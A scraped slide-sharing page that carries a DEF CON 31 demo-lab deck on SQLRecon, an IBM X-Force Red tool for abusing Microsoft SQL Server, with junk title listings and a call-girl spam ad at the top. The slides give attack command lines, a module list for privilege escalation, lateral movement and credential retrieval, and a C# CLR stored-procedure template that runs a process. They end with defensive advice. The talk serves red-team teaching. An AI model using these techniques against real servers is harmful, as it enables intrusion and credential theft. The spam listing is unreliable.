Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

  • 1. Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
  • 2. 2 Sanjiv Kawa Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator - Post-Exploitation Tooling Developer - github.com/xforcered/SQLRecon Intro @sanjivkawa github.com/skahwah IBM X-Force Red
  • 3. 3 Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min Agenda
  • 4. 4 Get Involved! Hack with me - Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases - Spin up a Windows VM - Connect to SSID SQLRecon-Lab, don’t worry, it’s safe - Connection details will be provided before demo’s
  • 6. 6 Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory MS SQL Server Overview
  • 7. 7 Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
  • 9. 9 What’s Currently Available? A good amount of offensive MS SQL Server tools already exist
  • 10. 10 How Did This Research Come About? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
  • 11. 11 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
  • 12. 12 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
  • 13. 13 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
  • 14. 14 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 15. 15 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 16. 16 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
  • 17. 17 Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
  • 18. 18 Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
  • 20. 20 Get Involved! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything
  • 21. 21 Get Involved! WiFi SSID: SQLRecon-Lab Password: DefconIsCancelled! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything. Lab (kawalabs.local) DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
  • 22. 22 Demo 1 Evaluating the current user’s permissions
  • 24. 24 Demo 2 Locating MS SQL Servers in AD via SPNs
  • 26. 26 Demo 3 Enumerating Azure MS SQL Server Database
  • 28. 28 Demo 4 Unprivileged UNC Path Injection
  • 30. 30 Demo 5 Operational Security and Execution Guardrails
  • 32. 32 Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
  • 33. 33 Demo 6 Privilege Escalation: Abusing Impersonation
  • 35. 35 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
  • 36. 36 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
  • 37. 37 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
  • 38. 38 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
  • 40. 40 Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
  • 41. 41 Demo 8 Credential Abuse: ADSI Double-Link Boomerang
  • 43. 43 Demo 9 SCCM / MECM Enumeration
  • 48. 48 Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
  • 49. 49 Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server best practices! - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
  • 50. 50 Questions or Comments? Thank You @xforcered github.com/xforcered/SQLRecon IBM X-Force Red github.com/skahwah @sanjivkawa